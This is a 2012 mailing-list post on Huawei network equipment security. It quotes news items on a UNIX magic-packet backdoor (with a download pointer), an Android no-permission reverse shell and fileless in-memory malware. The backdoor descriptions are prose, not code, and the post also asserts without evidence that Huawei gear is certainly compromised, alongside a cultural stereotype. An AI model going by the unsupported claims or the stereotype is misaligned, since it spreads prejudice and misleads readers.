[LINK] What's Behind the Huawei Fracas
stephen at melbpc.org.au
stephen at melbpc.org.au
Wed Mar 28 16:27:33 EST 2012
> The real issue is whether Huawei technology brings with it embedded
> insecurity ... The probability of Huawei backbone devices being
> compromised is very high ..
Yes agreed. One might say it's certain Huawei equipment is compromised.
Given that even Unix and Android are targets, my concerns would be how
quickly might Huawei 'loose face' with patches compared with say Cisco?
With due respect, some cultures *will not* admit any internal problems.
Hacks are inevitable. Anyone know Huawei's response & patch-fix times?
For current hack examples:
1. A recent UNIX backdoor ..
"Trixd00r v0.0.1 - An Invisible TCP/IP based backdoor for UNIX systems"
NullSecurity Team Releases "Trixd00r v0.0.1" an advanced and invisible
TCP/IP based userlandbackdoor for UNIX systems. It consists of a server
and a client. The server sits and waits for magic packets using a
sniffer. If a magic packet arrives, it will bind a shell over TCP or UDP
on the given port or connecting back to the client again over TCP or UDP.
The client is used to send magic packets to trigger the server and get a
shell. You can Download and Use trixd00r-0.0.1.tar.gz from NullSecurity.
2. A recent Android backdoor ..
"Backdoor in Android for No-Permissions Reverse Shell"
Security expert Thomas Cannon working at viaForensics as the Director of
R&D has demonstrated a custom-developed app that installs a backdoor in
Android smartphones without requiring any permissions or exploiting any
Thomas built an app which requires no permissions and yet is able to give
an attacker a remote shell and allow them to execute commands on the
device remotely from anywhere in the world. The functionality they are
exploiting to do this is not new, it has been quietly pointed out for a
number of years, and was explained in depth at Defcon 18.
It is not a zero-day exploit or a root exploit. They are using Android
the way it was designed to work, but in a clever way in order to
establish a 2-way communication channel. This has been tested on Android
versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a
similar way on all platforms.
The application operates by instructing the browser to access a
particular web page with specific parameters. This web page, and the
server behind it, will, in turn, control the app by forwarding the
browser to a URL that starts with a protocol prefix that is registered as
being handled by the app, for example app://. This process can then be
repeated and in doing so it enables two-way communication.
"In this demonstration Androids power and flexibility were perhaps also
its downfall. Other smartphone platforms *may* not offer the controls we
are bypassing at all, and the multi-tasking capabilities in Android
allowed us to run the attack almost transparently to the user. This power
combined with the open nature of Android also facilitates the
customisation of the system to meet bespoke security requirements. This
is something we have even been involved in ourselves by implementing a
proof of concept Loadable Kernel Module to pro-actively monitor and
defend a clients intellectual property as it passed through their
devices. It is no surprise that we have seen adoption of Android research
projects in the military and government as it can be enhanced and adapted
for specific security requirements, perhaps like no other mobile platform
before it." Thomas Cannon said.
3. And here's a new one that sits in RAM not on a drive, so hard to find.
'Kaspersky finds Malware that resides in your RAM"
Kaspersky Lab researchers have discovered a drive-by download attack that
evades hard-drive checkers by installing malware that lives in the
computer's memory. The 'fileless' bot is more difficult for antivirus
software to detect, and resides in memory until the machine is rebooted.
This Malware doesn't create any files on the affected systems was dropped
on to the computers of visitors to popular news sites in Russia in a
drive-by download attack. Drive-by download attacks are one of the
primary methods of distributing malware over the web.
The attack code loaded an exploit for a Java vulnerability (CVE-2011-
3544), but it wasn't hosted on the affected websites themselves. Once the
malware infected a Microsoft machine, the bot disabled User Account
Control, contacted a command and control server and downloaded the 'Lurk'
Trojan. The malware also attacked Apple devices.
The Java exploit's payload consisted of a rogue DLL that was loaded and
attached on the fly to the legitimate Java process. Normally this malware
is rare, because it dies when the system is rebooted and the memory is
cleared. But the hackers do not really care because there is a good
chance that most victims would revisit the infected news websites. Once
the malicious DLL loaded into memory it sends data and receives
instructions from a command and control server over HTTP.
More information about the Link